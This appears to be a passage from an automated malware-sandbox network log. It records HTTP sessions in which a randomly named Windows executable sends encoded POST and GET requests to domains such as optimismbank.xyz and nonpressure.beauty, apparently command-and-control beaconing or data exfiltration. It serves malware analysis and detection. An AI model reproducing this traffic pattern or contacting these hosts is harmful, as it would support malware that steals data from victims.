                                                                                  Nov 20, 2024 08:34:55.824889898 CET1236INData Raw: 40 73 75 70 70 6f 72 74 73 20 6e 6f 74 20 28 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 63 6c 61 6d 70 28 31 2e 35 72 65 6d 20 2c 2d 34 2e 33 30 34 38 37 38 30 34 38 38 72 65 6d 20 2b 20 32 39 2e 30 32 34 33 39 30 32 34 33 39 76 77 20 2c 38 2e 39 33
                                                                                  Data Ascii: @supports not (padding-left:clamp(1.5rem ,-4.3048780488rem + 29.0243902439vw ,8.9375rem)){.window-main{padding-left:calc(1.5rem + 7.4375*(100vw - 20rem)/ 25.625)}}@supports (padding-right:clamp(1.5rem ,-4.3048780488rem + 29.0243902439vw ,8.937
                                                                                  Nov 20, 2024 08:34:55.824922085 CET1236INData Raw: 6f 77 2d 6d 61 69 6e 5f 5f 74 69 74 6c 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 63 6c 61 6d 70 28 31 2e 35 72 65 6d 20 2c 2e 39 31 34 36 33 34 31 34 36 33 72 65 6d 20 2b 20 32 2e 39 32 36 38 32 39 32 36 38 33 76 77 20 2c 32 2e 32 35 72 65 6d 29 7d 7d
                                                                                  Data Ascii: ow-main__title{font-size:clamp(1.5rem ,.9146341463rem + 2.9268292683vw ,2.25rem)}}@supports not (font-size:clamp(1.5rem ,0.9146341463rem + 2.9268292683vw ,2.25rem)){.window-main__title{font-size:calc(1.5rem + .75*(100vw - 20rem)/ 25.625)}}@sup
                                                                                  Nov 20, 2024 08:34:55.824956894 CET1236INData Raw: 30 30 76 77 20 2d 20 32 30 72 65 6d 29 2f 20 32 35 2e 36 32 35 29 7d 7d 40 73 75 70 70 6f 72 74 73 20 28 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 63 6c 61 6d 70 28 30 2e 37 35 72 65 6d 20 2c 30 2e 36 35 32 34 33 39 30 32 34 34 72 65 6d 20 2b 20 30
                                                                                  Data Ascii: 00vw - 20rem)/ 25.625)}}@supports (padding-left:clamp(0.75rem ,0.6524390244rem + 0.487804878vw ,0.875rem)){.window-main__item{padding-left:clamp(.75rem ,.6524390244rem + .487804878vw ,.875rem)}}@supports not (padding-left:clamp(0.75rem ,0.6524
                                                                                  Nov 20, 2024 08:34:55.825069904 CET1236INData Raw: 36 31 20 32 38 37 2e 33 36 38 20 32 38 35 2e 32 32 38 20 32 35 39 2e 32 35 43 33 31 39 2e 36 39 36 20 32 33 31 2e 31 33 33 20 33 36 33 2e 30 31 38 20 32 36 32 2e 33 35 36 20 33 38 31 2e 39 39 31 20 33 32 38 2e 39 39 43 32 38 37 2e 39 39 20 34 31
                                                                                  Data Ascii: 61 287.368 285.228 259.25C319.696 231.133 363.018 262.356 381.991 328.99C287.99 418.472 360.522 563.421 360.522 563.421Z" fill="#00498D" /></g><g opacity="0.7" filter="url(#filter1_f_2001_5)"><ellipse cx="50.6112" cy="60.
                                                                                  Nov 20, 2024 08:34:55.825103045 CET1236INData Raw: 61 63 65 4f 6e 55 73 65 22 20 63 6f 6c 6f 72 2d 69 6e 74 65 72 70 6f 6c 61 74 69 6f 6e 2d 66 69 6c 74 65 72 73 3d 22 73 52 47 42 22 3e 0a 09 09 09 09 09 09 09 09 3c 66 65 46 6c 6f 6f 64 20 66 6c 6f 6f 64 2d 6f 70 61 63 69 74 79 3d 22 30 22 20 72
                                                                                  Data Ascii: aceOnUse" color-interpolation-filters="sRGB"><feFlood flood-opacity="0" result="BackgroundImageFix" /><feBlend mode="normal" in="SourceGraphic" in2="BackgroundImageFix" result="shape" /><feGaussianBlur stdDeviation="
                                                                                  Nov 20, 2024 08:34:55.825136900 CET552INData Raw: 20 53 53 4c 20 63 65 72 74 69 66 69 63 61 74 65 20 69 6e 73 74 61 6c 6c 65 64 2e 3c 2f 6c 69 3e 0a 09 09 09 09 09 09 09 3c 6c 69 20 63 6c 61 73 73 3d 22 77 69 6e 64 6f 77 2d 6d 61 69 6e 5f 5f 69 74 65 6d 22 3e 59 6f 75 72 20 64 6f 6d 61 69 6e 20
                                                                                  Data Ascii: SSL certificate installed.</li><li class="window-main__item">Your domain has an AAAA record, but the site only works with IPv4 on the server.</li></ul></div><div class="window-main__actions"><a href="https://
                                                                                  Nov 20, 2024 08:34:55.829943895 CET1236INData Raw: 31 32 2e 35 33 34 22 20 63 79 3d 22 31 33 34 2e 32 39 39 22 20 72 78 3d 22 31 31 32 2e 35 33 34 22 20 72 79 3d 22 31 33 34 2e 32 39 39 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 6d 61 74 72 69 78 28 2d 30 2e 39 31 36 33 36 36 20 30 2e 34 30 30 33 34
                                                                                  Data Ascii: 12.534" cy="134.299" rx="112.534" ry="134.299" transform="matrix(-0.916366 0.400341 -0.15071 -0.988578 379.183 586.577)" fill="#15B1F9" /></g><g opacity="0.8" filter="url(#filter1_f_2001_10)"><path d="M259.743 638.552C361


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  53192.168.2.65004413.248.169.48803320C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 20, 2024 08:35:00.930579901 CET822OUTPOST /lnyv/ HTTP/1.1
                                                                                  Host: www.optimismbank.xyz
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Connection: close
                                                                                  Content-Length: 213
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  Origin: http://www.optimismbank.xyz
                                                                                  Referer: http://www.optimismbank.xyz/lnyv/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Data Raw: 47 52 35 34 79 48 5a 38 3d 45 43 4f 6f 6c 34 5a 5a 34 69 47 54 66 57 66 30 49 76 5a 42 7a 39 34 36 32 31 35 46 63 59 4b 45 66 74 54 74 59 56 2b 39 53 6f 64 2b 6d 51 6d 4e 4b 32 4f 56 6a 34 74 7a 7a 56 69 6e 55 4e 43 65 45 4b 68 78 41 32 6d 58 62 74 4d 64 50 76 70 42 50 32 54 33 71 57 38 7a 52 68 69 4e 57 4b 57 46 51 64 45 68 69 30 7a 45 33 67 62 42 4b 7a 48 67 67 6c 35 48 4a 6b 64 5a 6b 6a 50 56 2f 41 62 54 57 41 64 76 63 64 37 77 76 4d 4b 51 63 6d 6a 4a 6b 35 71 72 30 66 78 67 6b 39 54 4a 70 56 4f 36 6b 57 44 59 79 4d 79 61 57 58 2f 52 51 6f 4c 4d 6b 6e 4d 33 37 7a 34 74 59 76 31 75 58 6a 6c 51 42 2b 38 31 50 39 68 71 53 41 31 57
                                                                                  Data Ascii: GR54yHZ8=ECOol4ZZ4iGTfWf0IvZBz946215FcYKEftTtYV+9Sod+mQmNK2OVj4tzzVinUNCeEKhxA2mXbtMdPvpBP2T3qW8zRhiNWKWFQdEhi0zE3gbBKzHggl5HJkdZkjPV/AbTWAdvcd7wvMKQcmjJk5qr0fxgk9TJpVO6kWDYyMyaWX/RQoLMknM37z4tYv1uXjlQB+81P9hqSA1W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  54192.168.2.65004513.248.169.48803320C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 20, 2024 08:35:03.477396011 CET846OUTPOST /lnyv/ HTTP/1.1
                                                                                  Host: www.optimismbank.xyz
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Connection: close
                                                                                  Content-Length: 237
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  Origin: http://www.optimismbank.xyz
                                                                                  Referer: http://www.optimismbank.xyz/lnyv/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Data Raw: 47 52 35 34 79 48 5a 38 3d 45 43 4f 6f 6c 34 5a 5a 34 69 47 54 66 32 76 30 62 63 42 42 31 64 34 35 35 56 35 46 48 6f 4b 41 66 74 66 74 59 51 48 69 54 62 35 2b 6e 7a 79 4e 46 55 6d 56 69 34 74 7a 38 31 69 6d 58 39 43 56 45 4b 74 6d 41 33 61 58 62 75 77 64 50 75 5a 42 50 46 4c 30 73 57 38 6d 51 52 69 50 53 4b 57 46 51 64 45 68 69 30 32 52 33 67 44 42 4b 44 58 67 68 45 35 59 58 55 64 57 7a 54 50 56 70 77 62 66 57 41 64 5a 63 63 6e 4b 76 50 79 51 63 69 6e 4a 39 4d 47 6b 36 66 78 6d 71 64 53 66 6b 32 66 73 69 77 57 34 30 71 61 48 51 51 2f 35 56 65 57 57 34 55 4d 55 70 6a 59 76 59 74 74 63 58 44 6c 36 44 2b 45 31 64 71 74 4e 64 30 51 31 35 37 37 70 76 33 71 37 67 2f 56 58 51 7a 51 6e 77 79 4c 77 54 67 3d 3d
                                                                                  Data Ascii: GR54yHZ8=ECOol4ZZ4iGTf2v0bcBB1d455V5FHoKAftftYQHiTb5+nzyNFUmVi4tz81imX9CVEKtmA3aXbuwdPuZBPFL0sW8mQRiPSKWFQdEhi02R3gDBKDXghE5YXUdWzTPVpwbfWAdZccnKvPyQcinJ9MGk6fxmqdSfk2fsiwW40qaHQQ/5VeWW4UMUpjYvYttcXDl6D+E1dqtNd0Q1577pv3q7g/VXQzQnwyLwTg==


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  55192.168.2.65004613.248.169.48803320C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 20, 2024 08:35:06.026964903 CET1859OUTPOST /lnyv/ HTTP/1.1
                                                                                  Host: www.optimismbank.xyz
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Connection: close
                                                                                  Content-Length: 1249
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  Origin: http://www.optimismbank.xyz
                                                                                  Referer: http://www.optimismbank.xyz/lnyv/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Data Raw: 47 52 35 34 79 48 5a 38 3d 45 43 4f 6f 6c 34 5a 5a 34 69 47 54 66 32 76 30 62 63 42 42 31 64 34 35 35 56 35 46 48 6f 4b 41 66 74 66 74 59 51 48 69 54 62 78 2b 6e 44 75 4e 4b 54 53 56 34 34 74 7a 31 56 69 72 58 39 43 79 45 4b 30 4f 41 33 57 68 62 6f 30 64 50 4d 68 42 59 45 4c 30 2f 32 38 6d 56 68 69 4b 57 4b 57 71 51 64 55 6c 69 30 6d 52 33 67 44 42 4b 42 66 67 6c 56 35 59 56 55 64 5a 6b 6a 50 6a 2f 41 61 49 57 41 46 6e 63 64 53 31 76 2f 53 51 63 47 44 4a 6d 61 53 6b 6c 50 78 6b 74 64 53 58 6b 32 53 79 69 30 32 43 30 75 61 68 51 58 2f 35 56 59 66 4a 6c 77 55 76 36 69 74 4e 41 4e 49 39 50 6d 70 6a 45 2b 51 56 65 4a 4e 59 63 6e 59 66 68 64 72 4b 35 31 6a 57 6a 5a 39 4f 58 55 46 34 79 77 65 6e 45 45 2f 6a 75 51 55 46 65 61 35 59 48 6c 77 54 51 5a 32 36 31 6f 79 4d 67 32 39 33 55 52 6d 54 74 7a 47 45 50 48 33 55 65 4a 34 30 62 2b 33 2b 75 73 4e 52 64 6c 76 51 63 78 42 37 5a 6a 76 39 6d 63 47 73 72 30 34 54 74 48 61 45 48 77 2b 42 78 36 32 63 71 62 4f 7a 48 74 39 47 5a 5a 33 50 42 34 46 5a 70 48 34 6b 2f [TRUNCATED]
                                                                                  Data Ascii: GR54yHZ8=ECOol4ZZ4iGTf2v0bcBB1d455V5FHoKAftftYQHiTbx+nDuNKTSV44tz1VirX9CyEK0OA3Whbo0dPMhBYEL0/28mVhiKWKWqQdUli0mR3gDBKBfglV5YVUdZkjPj/AaIWAFncdS1v/SQcGDJmaSklPxktdSXk2Syi02C0uahQX/5VYfJlwUv6itNANI9PmpjE+QVeJNYcnYfhdrK51jWjZ9OXUF4ywenEE/juQUFea5YHlwTQZ261oyMg293URmTtzGEPH3UeJ40b+3+usNRdlvQcxB7Zjv9mcGsr04TtHaEHw+Bx62cqbOzHt9GZZ3PB4FZpH4k/fOSGeefCIo++umuNr8/Xap4WyjGwfS80y7TFy6zOI3+SbXf6C5mi00wlybNIBu7trUcDOE8EQzt10TW/83zie0aKOWoRbEDwx4O0kA0nK9Fay+DbbvFtsX1mBheI3Z+oEEjXfQ8relrOJQrFTnsVfqHtTpyt04nbEnaTW9BvTFLfRomkxOEjqBd+IHz+wqeknjRUWVVudAUt4CayW+Nr+omsBG4s17khl7rm3KR/kBU7+9fvAstdghh++DORuz8Tg7fs7kicmBxEjVZl2vFLr24QHzoqRB32s6ijDKmfmTXACxRAzw90tfOzlCH2DjiPSlXD2nDA3+RBpMytbEDJMG2lvEcfCRiylT9/0x6Uw085rySeHV7XnTw28sUbJZNKfQRPDzzKTOma5DklGhL+ticSKm+yU4pZVFfm6JdRNTW3GPWu3yh65h11SwQAeb77nd446ZBNEietFyZZ1N5zT9R7mgm/GeWnEI1HkHgy5WBx0rhVt76pA4JJrGU7PZ6G96e6d+qfSQmRqAgQ00P3OZtgYWgGquaEGwyS94Hu9NpUbWhSnOU5jWVWHqhMmret/aMeJhmjEPhngkV0b26c288OfpD6Nsvx8BW9lFzMF4vheqtKDsaq65hfhCDsRroYht2qsjM3cmXqFl8OeiB/hsS6ji3VgnZUBz [TRUNCATED]


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  56192.168.2.65004713.248.169.48803320C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 20, 2024 08:35:08.565615892 CET558OUTGET /lnyv/?GR54yHZ8=JAmImNl6mB+RRlbpbvR3+e423BtxCo3/O8+kCBnAAYB05gHtC1vk8aJbyHyeZvKMcMp3FBCqV/xfRsVXPWDfq0wzcDycBqeORKYOzEG12hWJCinHhVNRLnpziyzgvH+OTjwtfrk=&9xn=fHadNpk8MVax HTTP/1.1
                                                                                  Host: www.optimismbank.xyz
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Nov 20, 2024 08:35:09.013777971 CET417INHTTP/1.1 200 OK
                                                                                  Server: openresty
                                                                                  Date: Wed, 20 Nov 2024 07:35:08 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 277
                                                                                  Connection: close
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 47 52 35 34 79 48 5a 38 3d 4a 41 6d 49 6d 4e 6c 36 6d 42 2b 52 52 6c 62 70 62 76 52 33 2b 65 34 32 33 42 74 78 43 6f 33 2f 4f 38 2b 6b 43 42 6e 41 41 59 42 30 35 67 48 74 43 31 76 6b 38 61 4a 62 79 48 79 65 5a 76 4b 4d 63 4d 70 33 46 42 43 71 56 2f 78 66 52 73 56 58 50 57 44 66 71 30 77 7a 63 44 79 63 42 71 65 4f 52 4b 59 4f 7a 45 47 31 32 68 57 4a 43 69 6e 48 68 56 4e 52 4c 6e 70 7a 69 79 7a 67 76 48 2b 4f 54 6a 77 74 66 72 6b 3d 26 39 78 6e 3d 66 48 61 64 4e 70 6b 38 4d 56 61 78 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?GR54yHZ8=JAmImNl6mB+RRlbpbvR3+e423BtxCo3/O8+kCBnAAYB05gHtC1vk8aJbyHyeZvKMcMp3FBCqV/xfRsVXPWDfq0wzcDycBqeORKYOzEG12hWJCinHhVNRLnpziyzgvH+OTjwtfrk=&9xn=fHadNpk8MVax"}</script></head></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  57192.168.2.650048104.21.4.93803320C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 20, 2024 08:35:14.099303007 CET828OUTPOST /ymqd/ HTTP/1.1
                                                                                  Host: www.nonpressure.beauty
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Connection: close
                                                                                  Content-Length: 213
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  Origin: http://www.nonpressure.beauty
                                                                                  Referer: http://www.nonpressure.beauty/ymqd/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Data Raw: 47 52 35 34 79 48 5a 38 3d 72 4e 61 61 35 46 2f 63 4c 4a 44 71 64 4f 50 36 6b 68 78 7a 77 35 68 77 6f 7a 6a 68 49 6b 68 30 35 46 33 52 45 39 32 51 4e 54 4c 72 6f 72 68 33 78 30 50 4c 6a 54 48 76 41 49 2b 62 45 61 68 73 70 44 42 6d 74 4d 65 59 73 43 67 63 42 70 63 6a 4f 6d 77 7a 51 69 53 2f 56 43 50 42 36 52 62 37 4b 6c 6a 34 61 6a 34 42 37 78 5a 50 5a 52 32 67 62 54 71 33 4f 33 43 63 4e 35 38 4c 74 2f 6d 55 4c 75 43 30 41 78 79 51 32 34 2b 52 4f 32 35 2f 35 52 66 65 79 6c 4a 6d 55 48 50 5a 31 2f 6e 69 67 4e 64 6e 37 4d 75 32 4e 71 4e 31 6b 56 39 41 4e 34 4e 48 45 77 77 54 7a 4b 42 71 71 74 55 42 38 4a 54 79 41 65 34 53 6e 44 4e 32
                                                                                  Data Ascii: GR54yHZ8=rNaa5F/cLJDqdOP6khxzw5hwozjhIkh05F3RE92QNTLrorh3x0PLjTHvAI+bEahspDBmtMeYsCgcBpcjOmwzQiS/VCPB6Rb7Klj4aj4B7xZPZR2gbTq3O3CcN58Lt/mULuC0AxyQ24+RO25/5RfeylJmUHPZ1/nigNdn7Mu2NqN1kV9AN4NHEwwTzKBqqtUB8JTyAe4SnDN2
                                                                                  Nov 20, 2024 08:35:14.776777029 CET680INHTTP/1.1 404 Not Found
                                                                                  Date: Wed, 20 Nov 2024 07:35:14 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache, no-store, must-revalidate
                                                                                  Expires: Wed, 20 Nov 2024 07:35:14 GMT
                                                                                  Vary: Accept-Encoding
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8e56c31b9a5572ad-EWR
                                                                                  Content-Encoding: gzip
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1873&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=828&delivery_rate=0&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                  Data Raw: 36 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 5c ce 41 0a 80 30 10 03 c0 7b 5f e1 0b 5c 2b 3d 86 3d 7a f4 0f 6a 8b 2b 68 0b 65 05 fd bd a0 05 c5 6b 32 84 40 74 5b d9 40 c2 e0 19 ba e8 1a d8 35 ae ea 93 56 5d da a3 07 3d 21 e8 26 06 63 f2 27 1b 4c 21 6a c8 0c b1 7f 2f 96 41 a5 36 90 fc e2 38 2f f1 20 5b b7 ae 6e 3e 84 ca 24 dd 5f 2e 00 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 68 e7 b5 eb 93 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 6f\A0{_\+==zj+hek2@t[@5V]=!&c'L!j/A68/ [n>$_.bh0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  58192.168.2.650049104.21.4.93803320C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 20, 2024 08:35:16.647392988 CET852OUTPOST /ymqd/ HTTP/1.1
                                                                                  Host: www.nonpressure.beauty
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Connection: close
                                                                                  Content-Length: 237
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  Origin: http://www.nonpressure.beauty
                                                                                  Referer: http://www.nonpressure.beauty/ymqd/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Data Raw: 47 52 35 34 79 48 5a 38 3d 72 4e 61 61 35 46 2f 63 4c 4a 44 71 63 74 58 36 6d 41 78 7a 78 5a 68 78 73 44 6a 68 43 45 68 77 35 46 37 52 45 34 57 41 4d 6c 62 72 6f 4f 64 33 79 31 50 4c 6d 54 48 76 4b 6f 2b 53 4a 36 68 5a 70 44 64 41 74 4a 65 59 73 43 63 63 42 70 73 6a 4f 52 6b 77 53 79 53 35 59 69 50 44 6b 68 62 37 4b 6c 6a 34 61 6a 38 72 37 78 52 50 5a 41 47 67 62 32 65 30 51 48 43 66 4d 35 38 4c 36 50 6d 51 4c 75 44 6a 41 77 75 36 32 2b 79 52 4f 7a 64 2f 35 67 66 64 34 6c 4a 67 58 33 4f 75 35 50 61 56 6b 65 34 38 79 50 6d 57 56 62 51 56 6f 44 67 61 52 4c 4e 6b 57 67 51 52 7a 49 5a 59 71 4e 55 72 2b 4a 72 79 53 4a 30 31 6f 33 6f 56 61 48 53 6b 48 44 32 44 30 33 76 6e 30 76 59 72 67 49 6d 64 52 67 3d 3d
                                                                                  Data Ascii: GR54yHZ8=rNaa5F/cLJDqctX6mAxzxZhxsDjhCEhw5F7RE4WAMlbroOd3y1PLmTHvKo+SJ6hZpDdAtJeYsCccBpsjORkwSyS5YiPDkhb7Klj4aj8r7xRPZAGgb2e0QHCfM58L6PmQLuDjAwu62+yROzd/5gfd4lJgX3Ou5PaVke48yPmWVbQVoDgaRLNkWgQRzIZYqNUr+JrySJ01o3oVaHSkHD2D03vn0vYrgImdRg==
                                                                                  Nov 20, 2024 08:35:17.312531948 CET680INHTTP/1.1 404 Not Found
                                                                                  Date: Wed, 20 Nov 2024 07:35:17 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache, no-store, must-revalidate
                                                                                  Expires: Wed, 20 Nov 2024 07:35:17 GMT
                                                                                  Vary: Accept-Encoding
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8e56c32b7e48c337-EWR
                                                                                  Content-Encoding: gzip
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1452&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=852&delivery_rate=0&cwnd=189&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                  Data Raw: 36 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 5c ce 41 0a 80 30 10 03 c0 7b 5f e1 0b 5c 2b 3d 86 3d 7a f4 0f 6a 8b 2b 68 0b 65 05 fd bd a0 05 c5 6b 32 84 40 74 5b d9 40 c2 e0 19 ba e8 1a d8 35 ae ea 93 56 5d da a3 07 3d 21 e8 26 06 63 f2 27 1b 4c 21 6a c8 0c b1 7f 2f 96 41 a5 36 90 fc e2 38 2f f1 20 5b b7 ae 6e 3e 84 ca 24 dd 5f 2e 00 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 68 e7 b5 eb 93 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 6f\A0{_\+==zj+hek2@t[@5V]=!&c'L!j/A68/ [n>$_.bh0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  59192.168.2.650050104.21.4.93803320C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 20, 2024 08:35:19.205195904 CET1865OUTPOST /ymqd/ HTTP/1.1
                                                                                  Host: www.nonpressure.beauty
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Connection: close
                                                                                  Content-Length: 1249
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  Origin: http://www.nonpressure.beauty
                                                                                  Referer: http://www.nonpressure.beauty/ymqd/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Data Raw: 47 52 35 34 79 48 5a 38 3d 72 4e 61 61 35 46 2f 63 4c 4a 44 71 63 74 58 36 6d 41 78 7a 78 5a 68 78 73 44 6a 68 43 45 68 77 35 46 37 52 45 34 57 41 4d 6c 54 72 6f 62 52 33 30 6d 6e 4c 68 54 48 76 4d 59 2b 66 4a 36 68 41 70 44 56 63 74 4a 61 69 73 48 59 63 44 4b 6b 6a 49 6a 63 77 49 69 53 35 48 79 50 65 36 52 62 75 4b 6c 7a 30 61 69 4d 72 37 78 52 50 5a 43 65 67 53 44 71 30 53 48 43 63 4e 35 38 35 74 2f 6e 33 4c 75 72 7a 41 7a 43 41 31 4f 53 52 4f 54 4e 2f 69 32 44 64 6c 31 4a 69 65 6e 4f 32 35 50 57 4b 6b 65 55 77 79 4d 36 73 56 5a 4d 56 73 57 78 38 4b 66 4a 76 48 78 67 70 71 5a 31 2f 6d 62 67 47 2f 35 76 51 43 2f 31 42 71 58 73 67 65 78 53 69 4d 77 50 69 38 30 37 4f 78 4b 30 2f 31 72 4c 44 44 79 73 4e 6a 5a 79 39 47 56 72 4e 79 76 72 56 6d 74 2b 66 77 51 56 46 6c 4f 42 79 66 6e 54 6d 53 4a 78 49 34 74 32 37 61 71 67 2f 45 63 74 33 62 70 72 4c 43 32 4b 79 6c 6d 43 4e 33 57 51 33 34 37 33 59 50 32 4f 5a 79 4c 70 65 6d 47 7a 6e 70 66 54 6a 61 6c 55 58 37 44 52 53 41 52 52 6e 30 6d 67 77 47 59 63 70 6e [TRUNCATED]
